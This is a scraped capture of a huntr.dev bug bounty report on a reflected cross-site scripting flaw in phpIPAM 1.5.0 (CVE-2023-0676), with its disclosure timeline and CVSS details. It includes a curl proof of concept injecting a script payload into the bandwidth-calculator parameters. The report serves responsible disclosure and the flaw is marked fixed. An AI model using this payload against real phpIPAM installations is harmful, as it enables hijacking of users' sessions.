huntr.dev
Open in
urlscan Pro
2600:9000:2435:ce00:14:bb32:5f00:93a1
Public Scan
URL:
https://huntr.dev/bounties/b72d4f0c-8a96-4b40-a031-7d469c6ab93b/
Submission: On February 08 via api from US — Scanned from DE
Submission: On February 08 via api from US — Scanned from DE
Form analysis 0 forms found in the DOM
Text Content
huntr
Open menu
/
Bounties 37 Community More
Responsible disclosure policy
FAQ
Contact us
Hacktivity
Leaderboard
Submit report Login
Logout
huntr
Close menu
/
--------------------------------------------------------------------------------
Bounties
Find your next target
Submission
Submit a report
Hacktivity
Browse public reports
Leaderboard
Our leaderboard
--------------------------------------------------------------------------------
Policy FAQ Contact us
Login
CROSS SITE SCRIPTING (XSS) REFLECTED IN PHPIPAM/PHPIPAM
0
Valid
Reported on
Nov 1st 2022
--------------------------------------------------------------------------------
DESCRIPTION
Reflected cross-site scripting (or XSS) arises when an application receives data
in an HTTP request and includes that data within the immediate response in an
unsafe way.
PROOF OF CONCEPT
1. i open this page localhost/phpipam/index.php?page=tools§ion=ip-calculator&subnetId=bw-calculator
2. and i analysis code line 41-45 https://github.com/phpipam/phpipam/blob/master/app/tools/ip-calculator/bw-calculator-result.php
3. next i tried with burpsuite to intercept and then change the value of some parameters such as wsize, delay and fsize on line 13-15 https://github.com/phpipam/phpipam/blob/master/app/tools/ip-calculator/ bw-calculator-result.php with <script>alert(1)</script> payload
4. and i trigger payload xss reflected <script>alert(1)</script>
//PoC
curl -i -s -k -X $'POST' \
-H $'Host: 192.168.1.15' -H $'Content-Length: 54' -H $'Accept: */*' -H $'X-Requested-With: XMLHttpRequest' -H $'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36' -H $'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H $'Origin: http://192.168.1.15' -H $'Referer: http://192.168.1.15/phpipam/index.php?page=tools§ion=ip-calculator&subnetId=bw-calculator' -H $'Accept-Encoding: gzip, deflate' -H $'Accept-Language: en-US,en;q=0.9,id;q=0.8' -H $'Connection: close' \
-b $'sectionSubnets.bs.table.searchText=; table-page-size=50; phpipam=p4jub8nb4ou2a95kso4ed22aom' \
--data-binary $'wsize=50000&delay=<script>alert(1)</script>&fsize=1024' \
$'http://192.168.1.15/phpipam/app/tools/ip-calculator/bw-calculator-result.php'
IMPACT
If an attacker can control a script that is executed in the victim's browser,
then they can typically fully compromise that user. Amongst other things, the
attacker can:
* Perform any action within the application that the user can perform.
* View any information that the user is able to view.
* Modify any information that the user is able to modify.
* Initiate interactions with other application users, including malicious
attacks, that will appear to originate from the initial victim user.
REFERENCES
* reference Reflected XSS
We are processing your report and will contact the phpipam team within 24 hours.
3 months ago
ZenalArifin modified the report
3 months ago
ZenalArifin modified the report
3 months ago
We have contacted a member of the phpipam team and are waiting to hear back 3
months ago
We have sent a follow up to the phpipam team. We will try again in 7 days. 3
months ago
We have sent a second follow up to the phpipam team. We will try again in 10
days. 3 months ago
We have sent a third and final follow up to the phpipam team. This report is now
considered stale. 3 months ago
garyallan validated this vulnerability 2 months ago
Thanks for reporting
ZenalArifin has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
garyallan marked this as fixed in 1.5.1 with commit 94ec73 2 months ago
garyallan has been awarded the fix bounty
This vulnerability has been assigned a CVE
This vulnerability is scheduled to go public on Dec 4th 2022
ZenalArifin
commented 2 months ago
Researcher
--------------------------------------------------------------------------------
thanks @garyallan for my first CVE <3
ZenalArifin
commented 8 days ago
Researcher
--------------------------------------------------------------------------------
hello @garyallan any update ?
ZenalArifin
commented 4 days ago
Researcher
--------------------------------------------------------------------------------
Hello. The CVE for this Vulnerability hast Not Bern published. When will you
publish IT ?
garyallan published this vulnerability 4 days ago
Sign in to join this conversation
CVE
CVE-2023-0676 (assigned)
Vulnerability Type
CWE-79: Cross-site Scripting (XSS) - Reflected
Severity
Low (2.4)
Attack vector Network
Attack complexity Low
Privileged required High
User interaction Required
Scope Unchanged
Confidentiality None
Integrity Low
Availability None
Open in visual CVSS calculator
Registry
Other
Affected Version
1.5.0
Visibility
Public
Status
Fixed
Found by
ZenalArifin
@z3n70
master
Fixed by
garyallan
@garyallan
maintainer
This report was seen 185 times.
We are processing your report and will contact the phpipam team within 24 hours.
3 months ago
ZenalArifin modified the report
3 months ago
ZenalArifin modified the report
3 months ago
We have contacted a member of the phpipam team and are waiting to hear back 3
months ago
We have sent a follow up to the phpipam team. We will try again in 7 days. 3
months ago
We have sent a second follow up to the phpipam team. We will try again in 10
days. 3 months ago
We have sent a third and final follow up to the phpipam team. This report is now
considered stale. 3 months ago
garyallan validated this vulnerability 2 months ago
Thanks for reporting
ZenalArifin has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
garyallan marked this as fixed in 1.5.1 with commit 94ec73 2 months ago
garyallan has been awarded the fix bounty
This vulnerability has been assigned a CVE
This vulnerability is scheduled to go public on Dec 4th 2022
ZenalArifin
commented 2 months ago
Researcher
--------------------------------------------------------------------------------
thanks @garyallan for my first CVE <3
ZenalArifin
commented 8 days ago
Researcher
--------------------------------------------------------------------------------
hello @garyallan any update ?
ZenalArifin
commented 4 days ago
Researcher
--------------------------------------------------------------------------------
Hello. The CVE for this Vulnerability hast Not Bern published. When will you
publish IT ?
garyallan published this vulnerability 4 days ago
Sign in to join this conversation
2022 © 418sec
HUNTR
* home
* hacktivity
* leaderboard
* FAQ
* contact us
* terms
* privacy policy
PART OF 418SEC
* company
* about
* team
Chat with us